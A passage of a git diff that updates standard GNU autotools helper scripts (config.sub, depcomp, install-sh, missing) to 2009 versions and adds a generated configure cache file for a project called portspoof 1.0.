not here because it comes later, after sysvr4. -gnu* | -bsd* | -mach* | -minix* | -genix* | -ultrix* | -irix* \ - | -*vms* | -sco* | -esix* | -isc* | -aix* | -sunos | -sunos[34]*\ + | -*vms* | -sco* | -esix* | -isc* | -aix* | -cnk* | -sunos | -sunos[34]*\ | -hpux* | -unos* | -osf* | -luna* | -dgux* | -solaris* | -sym* \ + | -kopensolaris* \ | -amigaos* | -amigados* | -msdos* | -newsos* | -unicos* | -aof* \ - | -aos* \ + | -aos* | -aros* \ | -nindy* | -vxsim* | -vxworks* | -ebmon* | -hms* | -mvs* \ | -clix* | -riscos* | -uniplus* | -iris* | -rtu* | -xenix* \ | -hiux* | -386bsd* | -knetbsd* | -mirbsd* | -netbsd* \ @@ -1209,7 +1280,7 @@ case $os in | -bosx* | -nextstep* | -cxux* | -aout* | -elf* | -oabi* \ | -ptx* | -coff* | -ecoff* | -winnt* | -domain* | -vsta* \ | -udi* | -eabi* | -lites* | -ieee* | -go32* | -aux* \ - | -chorusos* | -chorusrdb* \ + | -chorusos* | -chorusrdb* | -cegcc* \ | -cygwin* | -pe* | -psos* | -moss* | -proelf* | -rtems* \ | -mingw32* | -linux-gnu* | -linux-newlib* | -linux-uclibc* \ | -uxpv* | -beos* | -mpeix* | -udk* \ @@ -1219,7 +1290,7 @@ case $os in | -os2* | -vos* | -palmos* | -uclinux* | -nucleus* \ | -morphos* | -superux* | -rtmk* | -rtmk-nova* | -windiss* \ | -powermax* | -dnix* | -nx6 | -nx7 | -sei* | -dragonfly* \ - | -skyos* | -haiku* | -rdos* | -toppers*) + | -skyos* | -haiku* | -rdos* | -toppers* | -drops*) # Remember, each alternative MUST END IN *, to match a version number. ;; -qnx*) @@ -1349,6 +1420,9 @@ case $os in -zvmoe) os=-zvmoe ;; + -dicos*) + os=-dicos + ;; -none) ;; *) @@ -1414,6 +1488,9 @@ case $basic_machine in m68*-cisco) os=-aout ;; + mep-*) + os=-elf + ;; mips*-cisco) os=-elf ;; @@ -1543,7 +1620,7 @@ case $basic_machine in -sunos*) vendor=sun ;; - -aix*) + -cnk*|-aix*) vendor=ibm ;; -beos*) diff --git a/auto/depcomp b/auto/depcomp index ca5ea4e..df8eea7 100755 --- a/auto/depcomp +++ b/auto/depcomp @@ -1,10 +1,10 @@ #! /bin/sh # depcomp - compile a program generating dependencies as side-effects -scriptversion=2006-10-15.18 +scriptversion=2009-04-28.21; # UTC -# Copyright (C) 1999, 2000, 2003, 2004, 2005, 2006 Free Software -# Foundation, Inc. +# Copyright (C) 1999, 2000, 2003, 2004, 2005, 2006, 2007, 2009 Free +# Software Foundation, Inc. # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by @@ -17,9 +17,7 @@ scriptversion=2006-10-15.18 # GNU General Public License for more details. # You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA -# 02110-1301, USA. +# along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a @@ -87,6 +85,15 @@ if test "$depmode" = dashXmstdout; then depmode=dashmstdout fi +cygpath_u="cygpath -u -f -" +if test "$depmode" = msvcmsys; then + # This is just like msvisualcpp but w/o cygpath translation. + # Just convert the backslash-escaped backslashes to single forward + # slashes to satisfy depend.m4 + cygpath_u="sed s,\\\\\\\\,/,g" + depmode=msvisualcpp +fi + case "$depmode" in gcc3) ## gcc 3 implements dependency tracking that does exactly what @@ -192,14 +199,14 @@ sgi) ' < "$tmpdepfile" \ | sed -e 's/^.*\.o://' -e 's/#.*$//' -e '/^$/ d' | \ tr ' -' ' ' >> $depfile - echo >> $depfile +' ' ' >> "$depfile" + echo >> "$depfile" # The second pass generates a dummy entry for each header file. tr ' ' ' ' < "$tmpdepfile" \ | sed -e 's/^.*\.o://' -e 's/#.*$//' -e '/^$/ d' -e 's/$/:/' \ - >> $depfile + >> "$depfile" else # The sourcefile does not contain any dependencies, so just # store a dummy comment line, to avoid errors with the Makefile @@ -215,34 +222,39 @@ aix) # current directory. Also, the AIX compiler puts `$object:' at the # start of each line; $object doesn't have directory information. # Version 6 uses the directory in both cases. - stripped=`echo "$object" | sed 's/\(.*\)\..*$/\1/'` - tmpdepfile="$stripped.u" + dir=`echo "$object" | sed -e 's|/[^/]*$|/|'` + test "x$dir" = "x$object" && dir= + base=`echo "$object" | sed -e 's|^.*/||' -e 's/\.o$//' -e 's/\.lo$//'` if test "$libtool" = yes; then + tmpdepfile1=$dir$base.u + tmpdepfile2=$base.u + tmpdepfile3=$dir.libs/$base.u "$@" -Wc,-M else + tmpdepfile1=$dir$base.u + tmpdepfile2=$dir$base.u + tmpdepfile3=$dir$base.u "$@" -M fi stat=$? - if test -f "$tmpdepfile"; then : - else - stripped=`echo "$stripped" | sed 's,^.*/,,'` - tmpdepfile="$stripped.u" - fi - if test $stat -eq 0; then : else - rm -f "$tmpdepfile" + rm -f "$tmpdepfile1" "$tmpdepfile2" "$tmpdepfile3" exit $stat fi + for tmpdepfile in "$tmpdepfile1" "$tmpdepfile2" "$tmpdepfile3" + do + test -f "$tmpdepfile" && break + done if test -f "$tmpdepfile"; then - outname="$stripped.o" # Each line is of the form `foo.o: dependent.h'. # Do two passes, one to just change these to # `$object: dependent.h' and one to simply `dependent.h:'. - sed -e "s,^$outname:,$object :," < "$tmpdepfile" > "$depfile" - sed -e "s,^$outname: \(.*\)$,\1:," < "$tmpdepfile" >> "$depfile" + sed -e "s,^.*\.[a-z]*:,$object:," < "$tmpdepfile" > "$depfile" + # That's a tab and a space in the []. + sed -e 's,^.*\.[a-z]*:[ ]*,,' -e 's,$,:,' < "$tmpdepfile" >> "$depfile" else # The sourcefile does not contain any dependencies, so just # store a dummy comment line, to avoid errors with the Makefile @@ -323,7 +335,12 @@ hp2) if test -f "$tmpdepfile"; then sed -e "s,^.*\.[a-z]*:,$object:," "$tmpdepfile" > "$depfile" # Add `dependent.h:' lines. - sed -ne '2,${; s/^ *//; s/ \\*$//; s/$/:/; p;}' "$tmpdepfile" >> "$depfile" + sed -ne '2,${ + s/^ *// + s/ \\*$// + s/$/:/ + p + }' "$tmpdepfile" >> "$depfile" else echo "#dummy" > "$depfile" fi @@ -399,7 +416,7 @@ dashmstdout) # Remove the call to Libtool. if test "$libtool" = yes; then - while test $1 != '--mode=compile'; do + while test "X$1" != 'X--mode=compile'; do shift done shift @@ -450,32 +467,39 @@ makedepend) "$@" || exit $? # Remove any Libtool call if test "$libtool" = yes; then - while test $1 != '--mode=compile'; do + while test "X$1" != 'X--mode=compile'; do shift done shift fi # X makedepend shift - cleared=no - for arg in "$@"; do + cleared=no eat=no + for arg + do case $cleared in no) set ""; shift cleared=yes ;; esac + if test $eat = yes; then + eat=no + continue + fi case "$arg" in -D*|-I*) set fnord "$@" "$arg"; shift ;; # Strip any option that makedepend may not understand. Remove # the object too, otherwise makedepend will parse it as a source file. + -arch) + eat=yes ;; -*|$object) ;; *) set fnord "$@" "$arg"; shift ;; esac done - obj_suffix="`echo $object | sed 's/^.*\././'`" + obj_suffix=`echo "$object" | sed 's/^.*\././'` touch "$tmpdepfile" ${MAKEDEPEND-makedepend} -o"$obj_suffix" -f"$tmpdepfile" "$@" rm -f "$depfile" @@ -495,7 +519,7 @@ cpp) # Remove the call to Libtool. if test "$libtool" = yes; then - while test $1 != '--mode=compile'; do + while test "X$1" != 'X--mode=compile'; do shift done shift @@ -533,13 +557,27 @@ cpp) msvisualcpp) # Important note: in order to support this mode, a compiler *must* - # always write the preprocessed file to stdout, regardless of -o, - # because we must use -o when running libtool. + # always write the preprocessed file to stdout. "$@" || exit $? + + # Remove the call to Libtool. + if test "$libtool" = yes; then + while test "X$1" != 'X--mode=compile'; do + shift + done + shift + fi + IFS=" " for arg do case "$arg" in + -o) + shift + ;; + $object) + shift + ;; "-Gm"|"/Gm"|"-Gi"|"/Gi"|"-ZI"|"/ZI") set fnord "$@" shift @@ -552,16 +590,23 @@ msvisualcpp) ;; esac done - "$@" -E | - sed -n '/^#line [0-9][0-9]* "\([^"]*\)"/ s::echo "`cygpath -u \\"\1\\"`":p' | sort | uniq > "$tmpdepfile" + "$@" -E 2>/dev/null | + sed -n '/^#line [0-9][0-9]* "\([^"]*\)"/ s::\1:p' | $cygpath_u | sort -u > "$tmpdepfile" rm -f "$depfile" echo "$object : \\" > "$depfile" - . "$tmpdepfile" | sed 's% %\\ %g' | sed -n '/^\(.*\)$/ s:: \1 \\:p' >> "$depfile" + sed < "$tmpdepfile" -n -e 's% %\\ %g' -e '/^\(.*\)$/ s:: \1 \\:p' >> "$depfile" echo " " >> "$depfile" - . "$tmpdepfile" | sed 's% %\\ %g' | sed -n '/^\(.*\)$/ s::\1\::p' >> "$depfile" + sed < "$tmpdepfile" -n -e 's% %\\ %g' -e '/^\(.*\)$/ s::\1\::p' >> "$depfile" rm -f "$tmpdepfile" ;; +msvcmsys) + # This case exists only to let depend.m4 do its work. It works by + # looking at the text of this script. This case will never be run, + # since it is checked for above. + exit 1 + ;; + none) exec "$@" ;; @@ -580,5 +625,6 @@ exit 0 # eval: (add-hook 'write-file-hooks 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" -# time-stamp-end: "$" +# time-stamp-time-zone: "UTC" +# time-stamp-end: "; # UTC" # End: diff --git a/auto/install-sh b/auto/install-sh index 4fbbae7..6781b98 100755 --- a/auto/install-sh +++ b/auto/install-sh @@ -1,7 +1,7 @@ #!/bin/sh # install - install a program, script, or datafile -scriptversion=2006-10-14.15 +scriptversion=2009-04-28.21; # UTC # This originates from X11R5 (mit/util/scripts/install.sh), which was # later released in X11R6 (xc/config/util/install.sh) with the @@ -48,7 +48,7 @@ IFS=" "" $nl" # set DOITPROG to echo to test this script # Don't use :- since 4.3BSD and earlier shells don't like it. -doit="${DOITPROG-}" +doit=${DOITPROG-} if test -z "$doit"; then doit_exec=exec else @@ -58,34 +58,49 @@ fi # Put in absolute file names if you don't have them in your path; # or use environment vars. -mvprog="${MVPROG-mv}" -cpprog="${CPPROG-cp}" -chmodprog="${CHMODPROG-chmod}" -chownprog="${CHOWNPROG-chown}" -chgrpprog="${CHGRPPROG-chgrp}" -stripprog="${STRIPPROG-strip}" -rmprog="${RMPROG-rm}" -mkdirprog="${MKDIRPROG-mkdir}" +chgrpprog=${CHGRPPROG-chgrp} +chmodprog=${CHMODPROG-chmod} +chownprog=${CHOWNPROG-chown} +cmpprog=${CMPPROG-cmp} +cpprog=${CPPROG-cp} +mkdirprog=${MKDIRPROG-mkdir} +mvprog=${MVPROG-mv} +rmprog=${RMPROG-rm} +stripprog=${STRIPPROG-strip} + +posix_glob='?' +initialize_posix_glob=' + test "$posix_glob" != "?" || { + if (set -f) 2>/dev/null; then + posix_glob= + else + posix_glob=: + fi + } +' -posix_glob= posix_mkdir= # Desired mode of installed file. mode=0755 +chgrpcmd= chmodcmd=$chmodprog chowncmd= -chgrpcmd= -stripcmd= +mvcmd=$mvprog rmcmd="$rmprog -f" -mvcmd="$mvprog" +stripcmd= + src= dst= dir_arg= -dstarg= +dst_arg= + +copy_on_change=false no_target_directory= -usage="Usage: $0 [OPTION]... [-T] SRCFILE DSTFILE +usage="\ +Usage: $0 [OPTION]... [-T] SRCFILE DSTFILE or: $0 [OPTION]... SRCFILES... DIRECTORY or: $0 [OPTION]... -t DIRECTORY SRCFILES... or: $0 [OPTION]... -d DIRECTORIES... @@ -95,65 +110,55 @@ In the 2nd and 3rd, copy all SRCFILES to DIRECTORY. In the 4th, create DIRECTORIES. Options: --c (ignored) --d create directories instead of installing files. --g GROUP $chgrpprog installed files to GROUP. --m MODE $chmodprog installed files to MODE. --o USER $chownprog installed files to USER. --s $stripprog installed files. --t DIRECTORY install into DIRECTORY. --T report an error if DSTFILE is a directory. ---help display this help and exit. ---version display version info and exit. + --help display this help and exit. + --version display version info and exit. + + -c (ignored) + -C install only if different (preserve the last data modification time) + -d create directories instead of installing files. + -g GROUP $chgrpprog installed files to GROUP. + -m MODE $chmodprog installed files to MODE. + -o USER $chownprog installed files to USER. + -s $stripprog installed files. + -t DIRECTORY install into DIRECTORY. + -T report an error if DSTFILE is a directory. Environment variables override the default commands: - CHGRPPROG CHMODPROG CHOWNPROG CPPROG MKDIRPROG MVPROG RMPROG STRIPPROG + CHGRPPROG CHMODPROG CHOWNPROG CMPPROG CPPROG MKDIRPROG MVPROG + RMPROG STRIPPROG " while test $# -ne 0; do case $1 in - -c) shift - continue;; + -c) ;; - -d) dir_arg=true - shift - continue;; + -C) copy_on_change=true;; + + -d) dir_arg=true;; -g) chgrpcmd="$chgrpprog $2" - shift - shift - continue;; + shift;; --help) echo "$usage"; exit $?;; -m) mode=$2 - shift - shift case $mode in *' '* | *' '* | *' '* | *'*'* | *'?'* | *'['*) echo "$0: invalid mode: $mode" >&2 exit 1;; esac - continue;; + shift;; -o) chowncmd="$chownprog $2" - shift - shift - continue;; + shift;; - -s) stripcmd=$stripprog - shift - continue;; + -s) stripcmd=$stripprog;; - -t) dstarg=$2 - shift - shift - continue;; + -t) dst_arg=$2 + shift;; - -T) no_target_directory=true - shift - continue;; + -T) no_target_directory=true;; --version) echo "$0 $scriptversion"; exit $?;; @@ -165,21 +170,22 @@ while test $# -ne 0; do *) break;; esac + shift done -if test $# -ne 0 && test -z "$dir_arg$dstarg"; then +if test $# -ne 0 && test -z "$dir_arg$dst_arg"; then # When -d is used, all remaining arguments are directories to create. # When -t is used, the destination is already specified. # Otherwise, the last argument is the destination. Remove it from $@. for arg do - if test -n "$dstarg"; then + if test -n "$dst_arg"; then # $@ is not empty: it contains at least $arg. - set fnord "$@" "$dstarg" + set fnord "$@" "$dst_arg" shift # fnord fi shift # arg - dstarg=$arg + dst_arg=$arg done fi @@ -224,7 +230,7 @@ for src do # Protect names starting with `-'. case $src in - -*) src=./$src ;; + -*) src=./$src;; esac if test -n "$dir_arg"; then @@ -242,22 +248,22 @@ do exit 1 fi - if test -z "$dstarg"; then + if test -z "$dst_arg"; then echo "$0: no destination specified." >&2 exit 1 fi - dst=$dstarg + dst=$dst_arg # Protect names starting with `-'. case $dst in - -*) dst=./$dst ;; + -*) dst=./$dst;; esac # If destination is a directory, append the input filename; won't work # if double slashes aren't ignored. if test -d "$dst"; then if test -n "$no_target_directory"; then - echo "$0: $dstarg: Is a directory" >&2 + echo "$0: $dst_arg: Is a directory" >&2 exit 1 fi dstdir=$dst @@ -378,26 +384,19 @@ do # directory the slow way, step by step, checking for races as we go. case $dstdir in - /*) prefix=/ ;; - -*) prefix=./ ;; - *) prefix= ;; + /*) prefix='/';; + -*) prefix='./';; + *) prefix='';; esac - case $posix_glob in - '') - if (set -f) 2>/dev/null; then - posix_glob=true - else - posix_glob=false - fi ;; - esac + eval "$initialize_posix_glob" oIFS=$IFS IFS=/ - $posix_glob && set -f + $posix_glob set -f set fnord $dstdir shift - $posix_glob && set +f + $posix_glob set +f IFS=$oIFS prefixes= @@ -459,41 +458,54 @@ do # ignore errors from any of these, just make sure not to ignore # errors from the above "$doit $cpprog $src $dsttmp" command. # - { test -z "$chowncmd" || $doit $chowncmd "$dsttmp"; } \ - && { test -z "$chgrpcmd" || $doit $chgrpcmd "$dsttmp"; } \ - && { test -z "$stripcmd" || $doit $stripcmd "$dsttmp"; } \ - && { test -z "$chmodcmd" || $doit $chmodcmd $mode "$dsttmp"; } && + { test -z "$chowncmd" || $doit $chowncmd "$dsttmp"; } && + { test -z "$chgrpcmd" || $doit $chgrpcmd "$dsttmp"; } && + { test -z "$stripcmd" || $doit $stripcmd "$dsttmp"; } && + { test -z "$chmodcmd" || $doit $chmodcmd $mode "$dsttmp"; } && - # Now rename the file to the real destination. - { $doit $mvcmd -f "$dsttmp" "$dst" 2>/dev/null \ - || { - # The rename failed, perhaps because mv can't rename something else - # to itself, or perhaps because mv is so ancient that it does not - # support -f. + # If -C, don't bother to copy if it wouldn't change the file. + if $copy_on_change && + old=`LC_ALL=C ls -dlL "$dst" 2>/dev/null` && + new=`LC_ALL=C ls -dlL "$dsttmp" 2>/dev/null` && - # Now remove or move aside any old file at destination location. - # We try this two ways since rm can't unlink itself on some - # systems and the destination file might be busy for other - # reasons. In this case, the final cleanup might fail but the new - # file should still install successfully. - { - if test -f "$dst"; then - $doit $rmcmd -f "$dst" 2>/dev/null \ - || { $doit $mvcmd -f "$dst" "$rmtmp" 2>/dev/null \ - && { $doit $rmcmd -f "$rmtmp" 2>/dev/null; :; }; }\ - || { - echo "$0: cannot unlink or rename $dst" >&2 - (exit 1); exit 1 - } - else - : - fi - } && + eval "$initialize_posix_glob" && + $posix_glob set -f && + set X $old && old=:$2:$4:$5:$6 && + set X $new && new=:$2:$4:$5:$6 && + $posix_glob set +f && - # Now rename the file to the real destination. - $doit $mvcmd "$dsttmp" "$dst" - } - } || exit 1 + test "$old" = "$new" && + $cmpprog "$dst" "$dsttmp" >/dev/null 2>&1 + then + rm -f "$dsttmp" + else + # Rename the file to the real destination. + $doit $mvcmd -f "$dsttmp" "$dst" 2>/dev/null || + + # The rename failed, perhaps because mv can't rename something else + # to itself, or perhaps because mv is so ancient that it does not + # support -f. + { + # Now remove or move aside any old file at destination location. + # We try this two ways since rm can't unlink itself on some + # systems and the destination file might be busy for other + # reasons. In this case, the final cleanup might fail but the new + # file should still install successfully. + { + test ! -f "$dst" || + $doit $rmcmd -f "$dst" 2>/dev/null || + { $doit $mvcmd -f "$dst" "$rmtmp" 2>/dev/null && + { $doit $rmcmd -f "$rmtmp" 2>/dev/null; :; } + } || + { echo "$0: cannot unlink or rename $dst" >&2 + (exit 1); exit 1 + } + } && + + # Now rename the file to the real destination. + $doit $mvcmd "$dsttmp" "$dst" + } + fi || exit 1 trap '' 0 fi @@ -503,5 +515,6 @@ done # eval: (add-hook 'write-file-hooks 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" -# time-stamp-end: "$" +# time-stamp-time-zone: "UTC" +# time-stamp-end: "; # UTC" # End: diff --git a/auto/missing b/auto/missing index 1c8ff70..28055d2 100755 --- a/auto/missing +++ b/auto/missing @@ -1,10 +1,10 @@ #! /bin/sh # Common stub for a few missing GNU programs while installing. -scriptversion=2006-05-10.23 +scriptversion=2009-04-28.21; # UTC -# Copyright (C) 1996, 1997, 1999, 2000, 2002, 2003, 2004, 2005, 2006 -# Free Software Foundation, Inc. +# Copyright (C) 1996, 1997, 1999, 2000, 2002, 2003, 2004, 2005, 2006, +# 2008, 2009 Free Software Foundation, Inc. # Originally by Fran,cois Pinard , 1996. # This program is free software; you can redistribute it and/or modify @@ -18,9 +18,7 @@ scriptversion=2006-05-10.23 # GNU General Public License for more details. # You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA -# 02110-1301, USA. +# along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a @@ -89,6 +87,9 @@ Supported PROGRAM values: tar try tar, gnutar, gtar, then tar without non-portable flags yacc create \`y.tab.[ch]', if possible, from existing .[ch] +Version suffixes to PROGRAM as well as the prefixes \`gnu-', \`gnu', and +\`g' are ignored when checking the name. + Send bug reports to ." exit $? ;; @@ -106,15 +107,22 @@ Send bug reports to ." esac +# normalize program name to check for. +program=`echo "$1" | sed ' + s/^gnu-//; t + s/^gnu//; t + s/^g//; t'` + # Now exit if we have it, but it failed. Also exit now if we # don't have it and --version was passed (most likely to detect -# the program). +# the program). This is about non-GNU programs, so use $1 not +# $program. case $1 in - lex|yacc) + lex*|yacc*) # Not GNU programs, they don't have --version. ;; - tar) + tar*) if test -n "$run"; then echo 1>&2 "ERROR: \`tar' requires --run" exit 1 @@ -138,7 +146,7 @@ esac # If it does not exist, or fails to run (possibly an outdated version), # try to emulate it. -case $1 in +case $program in aclocal*) echo 1>&2 "\ WARNING: \`$1' is $msg. You should only need it if @@ -148,7 +156,7 @@ WARNING: \`$1' is $msg. You should only need it if touch aclocal.m4 ;; - autoconf) + autoconf*) echo 1>&2 "\ WARNING: \`$1' is $msg. You should only need it if you modified \`${configure_ac}'. You might want to install the @@ -157,7 +165,7 @@ WARNING: \`$1' is $msg. You should only need it if touch configure ;; - autoheader) + autoheader*) echo 1>&2 "\ WARNING: \`$1' is $msg. You should only need it if you modified \`acconfig.h' or \`${configure_ac}'. You might want @@ -187,7 +195,7 @@ WARNING: \`$1' is $msg. You should only need it if while read f; do touch "$f"; done ;; - autom4te) + autom4te*) echo 1>&2 "\ WARNING: \`$1' is needed, but is $msg. You might have modified some files without having the @@ -210,7 +218,7 @@ WARNING: \`$1' is needed, but is $msg. fi ;; - bison|yacc) + bison*|yacc*) echo 1>&2 "\ WARNING: \`$1' $msg. You should only need it if you modified a \`.y' file. You may need the \`Bison' package @@ -240,7 +248,7 @@ WARNING: \`$1' $msg. You should only need it if fi ;; - lex|flex) + lex*|flex*) echo 1>&2 "\ WARNING: \`$1' is $msg. You should only need it if you modified a \`.l' file. You may need the \`Flex' package @@ -263,7 +271,7 @@ WARNING: \`$1' is $msg. You should only need it if fi ;; - help2man) + help2man*) echo 1>&2 "\ WARNING: \`$1' is $msg. You should only need it if you modified a dependency of a manual page. You may need the @@ -277,11 +285,11 @@ WARNING: \`$1' is $msg. You should only need it if else test -z "$file" || exec >$file echo ".ab help2man is required to generate this page" - exit 1 + exit $? fi ;; - makeinfo) + makeinfo*) echo 1>&2 "\ WARNING: \`$1' is $msg. You should only need it if you modified a \`.texi' or \`.texinfo' file, or any other file @@ -310,7 +318,7 @@ WARNING: \`$1' is $msg. You should only need it if touch $file ;; - tar) + tar*) shift # We have already tried tar in the generic part. @@ -363,5 +371,6 @@ exit 0 # eval: (add-hook 'write-file-hooks 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" -# time-stamp-end: "$" +# time-stamp-time-zone: "UTC" +# time-stamp-end: "; # UTC" # End: diff --git a/autom4te.cache/output.0 b/autom4te.cache/output.0 new file mode 100644 index 0000000..3f56202 --- /dev/null +++ b/autom4te.cache/output.0 @@ -0,0 +1,6412 @@ +@%:@! /bin/sh +@%:@ Guess values for system-dependent variables and create Makefiles. +@%:@ Generated by GNU Autoconf 2.65 for portspoof 1.0. +@%:@ +@%:@ Report bugs to . +@%:@ +@%:@ +@%:@ Copyright (C) 1992, 1993, 1994, 1995, 1996, 1998, 1999, 2000, 2001, +@%:@ 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 Free Software Foundation, +@%:@ Inc. +@%:@ +@%:@ +@%:@ This configure script is free software; the Free Software Foundation +@%:@ gives unlimited permission to copy, distribute and modify it. +## -------------------- ## +## M4sh Initialization. ## +## -------------------- ## + +# Be more Bourne compatible +DUALCASE=1; export DUALCASE # for MKS sh +if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : + emulate sh + NULLCMD=: + # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which + # is contrary to our usage. Disable this feature. + alias -g '${1+"$@"}'='"$@"' + setopt NO_GLOB_SUBST +else + case `(set -o) 2>/dev/null` in @%:@( + *posix*) : + set -o posix ;; @%:@( + *) : + ;; +esac +fi + + +as_nl=' +' +export as_nl +# Printing a long string crashes Solaris 7 /usr/bin/printf. +as_echo='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo$as_echo +# Prefer a ksh shell builtin over an external printf program on Solaris, +# but without wasting forks for bash or zsh. +if test -z "$BASH_VERSION$ZSH_VERSION" \ + && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='print -r --' + as_echo_n='print -rn --' +elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='printf %s\n' + as_echo_n='printf %s' +else + if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then + as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"' + as_echo_n='/usr/ucb/echo -n' + else + as_echo_body='eval expr "X$1" : "X\\(.*\\)"' + as_echo_n_body='eval + arg=$1; + case $arg in @%:@( + *"$as_nl"*) + expr "X$arg" : "X\\(.*\\)$as_nl"; + arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;; + esac; + expr "X$arg" : "X\\(.*\\)" | tr -d "$as_nl" + ' + export as_echo_n_body + as_echo_n='sh -c $as_echo_n_body as_echo' + fi + export as_echo_body + as_echo='sh -c $as_echo_body as_echo' +fi + +# The user is always right. +if test "${PATH_SEPARATOR+set}" != set; then + PATH_SEPARATOR=: + (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { + (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || + PATH_SEPARATOR=';' + } +fi + + +# IFS +# We need space, tab and new line, in precisely that order. Quoting is +# there to prevent editors from complaining about space-tab. +# (If _AS_PATH_WALK were called with IFS unset, it would disable word +# splitting by setting IFS to empty value.) +IFS=" "" $as_nl" + +# Find who we are. Look in the path if we contain no directory separator. +case $0 in @%:@(( + *[\\/]* ) as_myself=$0 ;; + *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break + done +IFS=$as_save_IFS + + ;; +esac +# We did not find ourselves, most probably we were run as `sh COMMAND' +# in which case we are not to be found in the path. +if test "x$as_myself" = x; then + as_myself=$0 +fi +if test ! -f "$as_myself"; then + $as_echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 + exit 1 +fi + +# Unset variables that we do not need and which cause bugs (e.g. in +# pre-3.0 UWIN ksh). But do not cause bugs in bash 2.01; the "|| exit 1" +# suppresses any "Segmentation fault" message there. '((' could +# trigger a bug in pdksh 5.2.14. +for as_var in BASH_ENV ENV MAIL MAILPATH +do eval test x\${$as_var+set} = xset \ + && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : +done +PS1='$ ' +PS2='> ' +PS4='+ ' + +# NLS nuisances. +LC_ALL=C +export LC_ALL +LANGUAGE=C +export LANGUAGE + +# CDPATH. +(unset CDPATH) >/dev/null 2>&1 && unset CDPATH + +if test "x$CONFIG_SHELL" = x; then + as_bourne_compatible="if test -n \"\${ZSH_VERSION+set}\" && (emulate sh) >/dev/null 2>&1; then : + emulate sh + NULLCMD=: + # Pre-4.2 versions of Zsh do word splitting on \${1+\"\$@\"}, which + # is contrary to our usage. Disable this feature. + alias -g '\${1+\"\$@\"}'='\"\$@\"' + setopt NO_GLOB_SUBST +else + case \`(set -o) 2>/dev/null\` in @%:@( + *posix*) : + set -o posix ;; @%:@( + *) : + ;; +esac +fi +" + as_required="as_fn_return () { (exit \$1); } +as_fn_success () { as_fn_return 0; } +as_fn_failure () { as_fn_return 1; } +as_fn_ret_success () { return 0; } +as_fn_ret_failure () { return 1; } + +exitcode=0 +as_fn_success || { exitcode=1; echo as_fn_success failed.; } +as_fn_failure && { exitcode=1; echo as_fn_failure succeeded.; } +as_fn_ret_success || { exitcode=1; echo as_fn_ret_success failed.; } +as_fn_ret_failure && { exitcode=1; echo as_fn_ret_failure succeeded.; } +if ( set x; as_fn_ret_success y && test x = \"\$1\" ); then : + +else + exitcode=1; echo positional parameters were not saved. +fi +test x\$exitcode = x0 || exit 1" + as_suggested=" as_lineno_1=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_1a=\$LINENO + as_lineno_2=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_2a=\$LINENO + eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" && + test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1 +test \$(( 1 + 1 )) = 2 || exit 1" + if (eval "$as_required") 2>/dev/null; then : + as_have_required=yes +else + as_have_required=no +fi + if test x$as_have_required = xyes && (eval "$as_suggested") 2>/dev/null; then : + +else + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +as_found=false +for as_dir in /bin$PATH_SEPARATOR/usr/bin$PATH_SEPARATOR$PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + as_found=: + case $as_dir in @%:@( + /*) + for as_base in sh bash ksh sh5; do + # Try only shells that exist, to save several forks. + as_shell=$as_dir/$as_base + if { test -f "$as_shell" || test -f "$as_shell.exe"; } && + { $as_echo "$as_bourne_compatible""$as_required" | as_run=a "$as_shell"; } 2>/dev/null; then : + CONFIG_SHELL=$as_shell as_have_required=yes + if { $as_echo "$as_bourne_compatible""$as_suggested" | as_run=a "$as_shell"; } 2>/dev/null; then : + break 2 +fi +fi + done;; + esac + as_found=false +done +$as_found || { if { test -f "$SHELL" || test -f "$SHELL.exe"; } && + { $as_echo "$as_bourne_compatible""$as_required" | as_run=a "$SHELL"; } 2>/dev/null; then : + CONFIG_SHELL=$SHELL as_have_required=yes +fi; } +IFS=$as_save_IFS + + + if test "x$CONFIG_SHELL" != x; then : + # We cannot yet assume a decent shell, so we have to provide a + # neutralization value for shells without unset; and this also + # works around shells that cannot unset nonexistent variables. + BASH_ENV=/dev/null + ENV=/dev/null + (unset BASH_ENV) >/dev/null 2>&1 && unset BASH_ENV ENV + export CONFIG_SHELL + exec "$CONFIG_SHELL" "$as_myself" ${1+"$@"} +fi + + if test 